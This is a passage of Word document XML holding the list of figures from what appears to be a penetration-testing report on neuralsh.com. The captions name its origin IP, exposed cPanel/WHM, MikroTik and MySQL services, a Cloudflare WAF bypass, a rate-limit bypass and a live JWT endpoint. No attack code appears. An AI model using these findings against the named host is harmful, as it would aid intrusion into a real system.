      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Prestige Alliance office location map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Hack The Box platform logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  HTB Certified Penetration Testing Specialist (CPTS) logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  HTB Certified Web Exploitation Specialist (CWES) logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 7:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Penetration testing process diagram</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 8:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  OWASP logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 9:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  NIST SP 800-115 logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 10:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  CVSS v3.1 scoring system logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 11:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Nmap network scanner logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 12:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Nikto web server scanner logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 13:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Shodan search engine logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 14:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Burp Suite Community Edition logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 15:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  CyberChef data analysis tool logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 16:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Claude (Anthropic) AI assistant logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  VirtualBox showing Kali Linux VM running</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  SSH session from Linux Mint terminal connected to Kali VM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Tool version verification — Nmap, Nikto, Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  neuralsh.com homepage in browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  WHOIS lookup for neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  dig MX — origin IP discovery and DNS records</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.7:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Wildcard DNS — randomxyz123.neuralsh.com resolves to 103.16.62.217</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.8:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  SSL certificate mismatch — endoncambodia.com and onesala.com on origin server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.9:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Nmap full port scan of 103.16.62.217 — twenty-three open ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.10:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  cPanel and WHM login pages accessible from the public internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.11:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  MikroTik RouterOS WebFig login page — publicly accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.12:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Nikto web scanner results against neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.13:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Nuclei vulnerability scan — zero matches returned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.14:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Burp Suite — Cloudflare WAF bypass confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.15:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Rate limit bypass — fifty/fifty tokens, zero rate-limit responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.16:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  JWT endpoint confirmed live — HTTP 200 as of eleven June 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.17:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  WHM admin panel at 103.16.62.217:2087 — publicly accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.18:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  MikroTik WebFig — RouterOS v6.49.18, admin pre-filled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.19:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  MySQL connection from public IP — authentication prompt exposed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.20:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Thirty consecutive HTTP 200 responses — rate limiting not triggered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.21:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Burp Suite showing live JWT token response from /web/v1/init/token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure 4.22:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Attack chain diagram — four confirmed attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure A.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Nmap full port scan output — Appendix A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure C.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Thirty requests, zero rate-limit responses — Appendix C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure C.2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Rate limit bypass confirmation — Appendix C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure D.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  JWT token response in Burp Suite — Appendix D</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Figure D.2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  JWT endpoint returning HTTP 200, eleven June 2026 — Appendix D</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
